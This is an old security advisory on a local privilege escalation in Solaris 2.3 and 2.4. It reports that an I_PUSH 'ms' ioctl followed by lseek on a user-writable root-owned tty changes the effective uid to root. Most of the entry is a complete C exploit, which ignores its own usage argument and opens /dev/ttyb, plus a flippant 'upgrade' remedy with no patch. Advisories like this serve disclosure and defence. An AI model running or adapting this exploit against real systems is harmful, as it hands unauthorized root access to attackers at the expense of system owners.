COMMAND

    uid

SYSTEMS AFFECTED

    Solaris 2.3, 2.4

PROBLEM

    Shawn Instenes claims he got this from some engineers at Sun. He
    said that a patch existed for 2.4 but not for 2.3. However,
    according to one source, there is no patch for either of the two.

    If a tty port that is owned by root and writeable by the user is
    opened, and the I_PUSH "ms" ioctl call is made on it, followed by
    an lseek, the effective uid of the user is changed to root.
    Exploit follows:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <sys/types.h>
    #include <stropts.h>
    #include <sys/stat.h>
    #include <sys/conf.h>

    int main(int argc, char *argv[])
    {
        int fd;

        if (argc < 2)
            {
            fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
            exit(1);
            }

        /* Note: the device path is hard-coded; argv[1] is not used. */
        fd = open("/dev/ttyb", O_RDWR);
        printf("Your current effective uid is %d\n", (int)geteuid());
        /* Push the "ms" STREAMS module onto the tty stream. */
        ioctl(fd, I_PUSH, "ms");
        /* Seek by 0 from the current position (whence 1 is SEEK_CUR). */
        lseek(fd, 0, 1);
        printf("Your effective uid has been changed to %d\n", (int)geteuid());
        return 0;
    }

SOLUTION

    Since this is a rather old bug, I guess a fix is out. If not
    (which I doubt), buy yourself a newer Solaris.